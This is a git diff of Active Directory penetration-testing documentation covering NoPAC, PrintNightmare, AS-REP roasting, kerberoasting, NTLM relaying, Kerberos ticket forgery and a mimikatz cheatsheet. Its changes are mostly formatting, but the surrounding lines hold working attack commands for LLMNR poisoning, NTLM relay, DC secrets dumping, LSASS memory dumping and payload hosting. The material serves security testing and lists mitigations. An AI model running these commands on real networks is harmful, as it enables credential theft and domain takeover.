diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index dd71d26..83bc4db 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -112,6 +112,7 @@ Automated exploitation: ``` **Mitigations**: + * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) diff --git a/docs/active-directory/CVE/PrintNightmare.md b/docs/active-directory/CVE/PrintNightmare.md index 979a750..788ddee 100644 --- a/docs/active-directory/CVE/PrintNightmare.md +++ b/docs/active-directory/CVE/PrintNightmare.md @@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. The exploit will execute the DLL either from the local filesystem or a remote share. Requirements: + * **Spooler Service** enabled (Mandatory) * Server with patches < June 2021 * DC with `Pre Windows 2000 Compatibility` group @@ -14,6 +15,7 @@ Requirements: **Detect the vulnerability**: + * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) ```ps1 python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' @@ -28,20 +30,23 @@ Requirements: ``` **Payload Hosting**: + * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): -```ps1 -python3 ./smbserver.py share /tmp/smb/ -``` + ```ps1 + python3 ./smbserver.py share /tmp/smb/ + ``` * Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): -```ps1 -Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable -``` + ```ps1 + Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable + ``` * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): -```ps1 -SharpWebServer.exe port=8888 dir=c:\users\public verbose=true -``` + ```ps1 + SharpWebServer.exe port=8888 dir=c:\users\public verbose=true + ``` + When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: + ```ps1 cme smb -u user -p password -d domain.local -M webdav [TARGET] ``` diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index a68c2ba..c52dd73 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -2,11 +2,14 @@ ## Using BloodHound -Use the correct collector +Use the correct collector: + * AzureHound for Azure Active Directory * SharpHound for local Active Directory * RustHound for local Active Directory +**Examples**: + * use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) * use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) @@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up ``` You can add some custom queries like : + * [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) * [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) * [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) diff --git a/docs/active-directory/ad-adds-ntds-dumping.md b/docs/active-directory/ad-adds-ntds-dumping.md index c64650e..eb96300 100644 --- a/docs/active-directory/ad-adds-ntds-dumping.md +++ b/docs/active-directory/ad-adds-ntds-dumping.md @@ -5,6 +5,7 @@ You will need the following files to extract the ntds : - SYSTEM hive (`C:\Windows\System32\SYSTEM`) Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. + - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. @@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : + - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) diff --git a/docs/active-directory/ad-roasting-asrep.md b/docs/active-directory/ad-roasting-asrep.md index 64945b7..7d94d58 100644 --- a/docs/active-directory/ad-roasting-asrep.md +++ b/docs/active-directory/ad-roasting-asrep.md @@ -3,6 +3,7 @@ > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting **Requirements**: + * Accounts with the attribute **DONT_REQ_PREAUTH** * Windows/Linux: ```ps1 @@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa ``` **Mitigations**: -* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). ## Kerberoasting w/o domain account @@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html **Requirements**: + * Accounts with the attribute **DONT_REQ_PREAUTH** * Windows/Linux: ```ps1 @@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose ``` -* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) +* Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) ```bash user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache @@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- ``` **Mitigations**: + * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). * Disable RC4 cipher if possible. diff --git a/docs/active-directory/ad-roasting-kerberoasting.md b/docs/active-directory/ad-roasting-kerberoasting.md index 4fa6e8b..6644e85 100644 --- a/docs/active-directory/ad-roasting-kerberoasting.md +++ b/docs/active-directory/ad-roasting-kerberoasting.md @@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) **Mitigations**: + * Have a very long password for your accounts with SPNs (> 32 characters) * Make sure no users have SPNs diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md index a7dafcf..329737d 100644 --- a/docs/active-directory/deployment-sccm.md +++ b/docs/active-directory/deployment-sccm.md @@ -67,7 +67,8 @@ > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. -On the machine. +On the machine + * Find SCCM blob ```ps1 Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" diff --git a/docs/active-directory/hash-capture.md b/docs/active-directory/hash-capture.md index 93e8c43..ca0e5b7 100644 --- a/docs/active-directory/hash-capture.md +++ b/docs/active-directory/hash-capture.md @@ -2,14 +2,16 @@ ## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens -> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. +> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. :information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. **Requirements**: + * LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) **Exploitation**: + * Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge ```ps1 HTTPS = On @@ -68,6 +70,7 @@ * Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` + ## Capturing and cracking Net-NTLMv2/NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md index 0ee12f3..b048240 100644 --- a/docs/active-directory/internal-mitm-relay.md +++ b/docs/active-directory/internal-mitm-relay.md @@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets ## LDAP signing not required and LDAP channel binding disabled During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: + * LDAP signing not required (by default set to `Not required`) * LDAP channel binding is disabled. (by default disabled) * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. + ```bash # On first terminal sudo ./Responder.py -I eth0 -wfrd -P -v @@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc ``` - - Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell # create a new machine account TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support @@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' ## Ghost Potato - CVE-2019-1384 Requirements: + * User must be a member of the local Administrators group * User must be a member of the Backup Operators group * Token must be elevated @@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine Requirements: + - a shell in session 0 (e.g. WinRm shell or SSH shell) - a privileged user is logged on in the session 1 (e.g. a Domain Admin user) @@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' ## DNS Poisonning - Relay delegation with mitm6 Requirements: + - IPv6 enabled (Windows prefers IPV6 over IPv4) - LDAP over TLS (LDAPS) @@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB **Requirement**: + * WebClient service **Exploitation**: + * Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` * Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 * Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` @@ -267,12 +274,16 @@ pyrdp-mitm.py pyrdp-mitp.py : # with custom port pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate ``` -* Exploitation - * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge - * If NLA is disabled, you will obtain the password in plaintext - * Other features are available such as keystroke recording -* Alternatives - * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener + +**Exploitation** + +* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge +* If NLA is disabled, you will obtain the password in plaintext +* Other features are available such as keystroke recording + +**Alternatives** + +* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener ## References diff --git a/docs/active-directory/kerberos-bronze-bit.md b/docs/active-directory/kerberos-bronze-bit.md index 7901860..051cf47 100644 --- a/docs/active-directory/kerberos-bronze-bit.md +++ b/docs/active-directory/kerberos-bronze-bit.md @@ -9,6 +9,7 @@ CVE-2020-17049 :warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` Requirements: + * Service account's password hash * Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` * [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) diff --git a/docs/active-directory/kerberos-tickets.md b/docs/active-directory/kerberos-tickets.md index 82e2d70..d52279a 100644 --- a/docs/active-directory/kerberos-tickets.md +++ b/docs/active-directory/kerberos-tickets.md @@ -111,6 +111,7 @@ Converting kirbi => ccache Mitigations: + * Hard to detect because they are legit TGT tickets * Mimikatz generate a golden ticket with a life-span of 10 years @@ -148,6 +149,7 @@ Interesting services to target with a silver ticket : Mitigations: + * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. @@ -155,7 +157,8 @@ Mitigations: > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key -Require: +Requirements: + * krbtgt NT Hash * krbtgt AES key @@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR The goal is to mimic the PAC field as close as possible to a legitimate one. -Require: +Requirements: + * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) * krbtgt AES key diff --git a/docs/cheatsheets/mimikatz-cheatsheet.md b/docs/cheatsheets/mimikatz-cheatsheet.md index 7b54ffa..ffdd733 100644 --- a/docs/cheatsheets/mimikatz-cheatsheet.md +++ b/docs/cheatsheets/mimikatz-cheatsheet.md @@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo * Adding requires lock * Removing requires reboot + ## LSA Protection Workaround - LSA as a Protected Process (RunAsPPL) @@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass. Use the minidump: + * Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` ```powershell mimikatz # sekurlsa::minidump lsass.dmp